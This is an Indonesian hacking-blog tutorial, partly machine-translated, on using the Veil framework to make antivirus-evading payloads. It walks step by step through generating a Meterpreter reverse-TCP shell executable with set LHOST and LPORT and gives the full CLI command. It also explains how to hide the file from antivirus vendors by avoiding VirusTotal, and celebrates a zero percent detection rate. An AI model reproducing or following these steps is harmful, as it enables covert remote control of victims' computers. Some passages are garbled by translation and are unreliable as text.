yang
dikembangkan oleh Chris Truncer @ ChrisTruncer, Mike Wright @
TheMightyShiv dan The Grayhound @ the_grayhound khusus dirancang untuk Kali Linux dengan tujuan:
- Bypass solusi AV yang umum digunakan.
- Dapatkan muatan dari kerangka Metasploit, dan mendapatkan yang baru di rilis Metasploit masa depan.
- Cobalah untuk membuat setiap payload sebagai random mungkin.
Saya ingin berbicara tentang Veil dan memberikan beberapa contoh tentang bagaimana untuk memotong beberapa anti-virus.
Perubahan utama dalam versi terbaru adalah:
- kompatibilitas x64 - Mereka telah diperbarui skrip pengaturan mereka untuk membuat Veil kompatibel dengan x86 dan x64 versi.
- Fitur Update - Sekarang Veil memiliki fungsi update. Sekarang kita dapat memperbarui Veil baik baris perintah atau menu.
Jika Anda ingin menginstal Veil dalam lingkungan apa pun yang Anda inginkan, Anda dapat menggunakan perintah di bawah ini:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip
master.zip unzip
cd Veil-master/setup
cd ..
. / Setup.sh
Jika Anda ingin bekerja dengan Kali Linux , dengan perintah di bawah ini akan cukup.
apt-get Update
apt-get install veil
Saya
punya pengalaman buruk dengan pilihan kedua dan saya lebih memilih
untuk menginstal Veil dengan yang pertama menggunakan "setup.sh" script.
Pengembang
Veil yang tidak ingin menyerahkan payload apapun untuk
www.virustotal.com untuk menghindari distribusi ke vendor anti-virus .
Ada alternatif: vscan.novirusthanks.org . Situs yang memindai file yang mencurigakan untuk deteksi malware dan menawarkan kita pilihan: "Do not distribute the samplel".
Ketika Veil telah terinstal, jalankan dengan perintah di bawah ini:
. / Veil
Secara default di Kali Linux, kita dapat melihat 18 muatan siap untuk digunakan. Sekarang kita dapat mengetik "use".
Di sini, Kerudung menawarkan kita informasi lebih lanjut tentang muatan. Dalam hal ini saya memilih python/b64VirtualAlloc mengetik " 18 "
Ketika payload kita dimuat, ketik " generate ". Anda dapat mengatur beberapa opsi spesifik, tapi dalam posting ini, kita akan mencoba opsi default.
Sekarang kita akan memilih msfvenom dengan mengetik " 1 "
Setelah itu, kita perlu mengetikkan beberapa rincian:
- Masukkan metasploit payload: “windows/meterpreter/reverse_tcp“
- Masukkan nilai untuk 'LHOST', [ tab ] untuk IP lokal: "192.168.69.69"
- Masukkan nilai untuk 'LPORT': " 443 "
Maka itu perlu untuk menunggu sementara shellcode yang telah dihasilkan.
Anda harus tekan enter dan kemudian Veil meminta nama payload kami. Dalam hal ini “undetectable” (atau apa pun yang Anda inginkan)
Kita akan menggunakan PyInstaller. Ini akan membuat exe diinstal.. Untuk ini, kita akan mengetik " 1 "
Pada akhirnya, kita bisa mendapatkan executable kami di “/root/Veil-master/output/compiled/”
Sekarang, kami memiliki executable kami dan kami akan mengirimkannya ke vscan.novirusthanks.org . Silahkan, ingat untuk memeriksa “Do not distribute the sample“. Jika Anda memilih untuk tidak memeriksa opsi ini atau Anda memutuskan untuk mengirimkan executable untuk www.virustotal.com file Anda akan diselidiki dan mungkin itu akan diakui oleh beberapa vendor anti-virus.
Anda dapat melihat pada gambar di bawah salah satu vendor anti-virus mendeteksi file kita sebagai berbahaya. Kami sudah mendapat deteksi tingkat 0%!!
Jika
Anda memilih untuk menggunakan CLI bukan menu, Anda dapat menghasilkan
muatan yang sama kita buat dengan perintah di bawah ini.
./Veil.py
-l python -p b64VirtualAlloc -o undetectable –msfpayload
windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.69.69
LPORT=443
Sekian tutorial dari saya, semoga bermanfaat. :))
Terus kunjungi
Blog ini, untuk selanjutnya saya akan share beberapa trick dan tutorial tentang Hacking.
wasslam....